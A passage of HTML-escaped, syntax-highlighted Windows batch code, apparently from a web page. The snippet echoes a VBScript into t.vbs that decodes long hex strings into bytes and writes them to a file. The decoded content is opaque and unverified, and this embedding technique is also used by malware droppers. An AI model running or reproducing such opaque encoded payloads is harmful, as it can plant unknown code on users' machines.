102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A8B51B1DA069E285946D70E56509E8F4B1513E1759D182DEB9251E5CC69E8750DE3BCA"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0FB8B4D894B0A7F82B104CE99FA11D3F5C44BDC5755662E1110F11DC501205B7D41AE8"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AD782D19DCA00E56335CF12C54A007376FB8E6115A13C84EB31237454E88048744527D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A9B37C46DBA5CE03C3DEBBCC2A1B7621FDE589762246C6380CF20FB056353A59431E2C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"A7E1CA596914E304FFBAF05498625FCB00738335C4D20BF3001F7329B5FB72183088CB"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"977B02546D65C3BA7427F60220517AFE8385145C38B0C33B0F18F4C01E24C628772445"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"4E638CE318197183EC64E1389DCAB037EC51F1EBAED225741140C11D1FBCF8544ACB50"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"DAE18455E6797FB84F76F9084AA29B06AC05078D8F1221590DBE714DE8ADC1E87A9305"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C36C217233A525370B013133D58D43CC22F41297C32A862B074B6A1B2EA3764F2CDE9B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0275620DC5420A1C38369203CAAC1DB5A0F87A511944F0C700110C1CF83310035DEA44"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"468EC6B8A9375AE295701A4C19DF9A892E7E6B4BD75514713D7F3784413B236C9417D6"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"40774B37D4EF8C82B235C0DDC243A17A6733900984E6EFD8854B619458AA06975B386E"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0DB44A56E8E9351AAF2BF4D6401134AC8F8D38418CA6CAF8E6414118E5EE1AC0572995"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"816BC74EF593BB116635828387E1D0ED68FC5356E3EFA070DCE48605B4120B9DAE2B60"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8C985B81DF6913985CC348C892E5FA0E54EC722664399B6CEDF7045B7F809868400C74"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8064D1AE418199D15A3C540218DAA04E241A4480C1A3E2267F1AA248B1E81C4DA038D5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"42ABD2D18115346054AE4639611670BA08D52157A3124D374C2AD07510192447269508"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9155A2EAB0C0A5B0D01331DEDC4BF72BFF37A0EFF81F8166C387DBCDB19A3C3381BC22"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9DA2E8120178ABBDC1FD087D86050CFCF45D68087381BB08CC3932E816DFA01E6618A4"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"15AD1082058C23F550E7D675F9FC07BDD77F007BE8B58D4D8DDDD3C0930087B3B11B5D"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"0A76B2C51644BC612F5F070ADA33F95A9535E26F5CBC34C69CD2E94EBB962C40454F0C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"2EA1AFC545FDDD30C25FFA68B09472DC1F98AA0D8C7E90A658DE10B4C74442B6816A4B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6E69DB0C2C92818A6839C41D61C2ABD5694C5076F6ADEC40CB5176A26B0E791B5B82A6"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"F74C887FD71DEEF901AA46CB11F8395C277741D5062006406BE8E4CC9407A7341F6526"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"3E3029277799502C2F68196079482145CBF7DC0DD0DA2544744002DC6ABA8B727D70B3"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"115C9462F794EA96A38CB2DA3D2927277718E6179064455EA0D5AED93F0B155C285060"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AC5C756A19C661775045AE84E9CB35ED4E193BA97AF64CA76702FEEE45705CBB0F98A4"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8C3B3066A707E348187B440C0B400CB5B827D63444D9319F2B8ED01C74C4A1DCC398AD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"D2657A5C848751B64024DB445605C7B71F19F4845B76487D22026C2D1B2DEF06AE5466"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"540D68CE989895E01D6BAE32C546137F030CA36977EB644C9AD1C0CBC5411740560259"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/do.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;Do&lt;/span&gt;&lt;/a&gt; &gt;&gt;t.vbs &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/echo.html"&gt;&lt;span style="color: rgb(177, 177, 0); font-weight: bold;"&gt;Echo&lt;/span&gt;&lt;/a&gt;.&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; b=1To 69Step 2:o.Write Chr&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;Clng&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;"&amp;amp;H"^&amp;amp;Mid&lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt;,b,W^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;^&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;:Next&lt;span style="color: rgb(102, 204, 102);"&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;&lt;a href="http://www.ss64.com/nt/for.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;For&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(51, 204, 51);"&gt;%%&lt;/span&gt;&lt;span style="color: rgb(68, 136, 136);"&gt;b&lt;/span&gt; &lt;a href="http://www.ss64.com/nt/in.html"&gt;&lt;span style="color: rgb(0, 177, 0); font-weight: bold;"&gt;In&lt;/span&gt;&lt;/a&gt; &lt;span style="color: rgb(102, 204, 102);"&gt;(&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"B52EC2315BCDCA1A6682E7A8D82D75C2D4F506EAAA811E6163F235ACCCDE4D47F5C8C7"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"152D4A3EE518A634CA5A046635DDB6634AACC4C4FFE60A2A6303C4DADC158AC04260D8"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"AF70E61F386E8EFF5ED3679F85F337B44A97D3D9BFE39DFD4171C0101183C9F11D4084"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C85F868797F0E3ABDF65AE4CD1ABF4E419C4E5C07502AED384547ED79038778525309B"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"6C1BEE31430F0635959F9F4837058554988D10598863CF216B47AC28F8CE1FA1CA50F6"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"832981B05DD05C5234BF8C0E50B0A643D1FC3406D08D7236CCC89B80C63DCFE1B610BF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"8CD2840D7167F63C42F73411216CDE829179E310FAF3A954ABE4D11BEC8CEB2A06CF2A"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"77F0B08EC8F6145D57EDFCC3A7765EF5573B9740A9785E1D8F64BCEB22E81BFF75C2AD"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"92839638CAC89A7E84D1B6FA1445DBE6C99C4E092BC202486CB5123E00083A7A4DFCD2"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"9ED3AEED592CA7526E7A1B3B9A0CADA0D69652EA6D9E8AD1E22AB929FEA356792EC081"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"FE27E0CE355BAFAA36D413139A1AE5A3C78EE47472B0C91120BCB008A0F777D87BB44C"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"5DAFEF5414F9565D841E35874E0E9DFF4A3BFB7B045E6FEC2CEE220E4A58C634EC3CA6"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"C48378E0F6F42A63AB5318F13E5F5D408816C3343665A4F24FF1E8CD81A30396BE4DAE"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"E7953F0902DD7C0B81CC48B3177F45C8F2652D02BBABCC422B7E8271CB5DDACD90A7C1"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"3DA1C17DF6A82D2FC41E788E6AC8C8675E11D701FA0581ADD2FCB2317A6D54E3CD3FDF"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: normal; vertical-align: top;"&gt;&lt;div style="margin: 0pt; padding: 0pt; background: transparent none repeat scroll 0% 0%; font-family: monospace; font-style: normal; font-variant: normal; font-weight: normal; font-size: 1em; line-height: 1.2em; font-size-adjust: none; font-stretch: normal; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial; vertical-align: top;"&gt;"981AF9B9D4C8C7C03A275B66D21055895669D74FC8BE46A562779B7EC402CBE9DEE4A5"&lt;/div&gt;&lt;/li&gt;&lt;li style="font-weight: 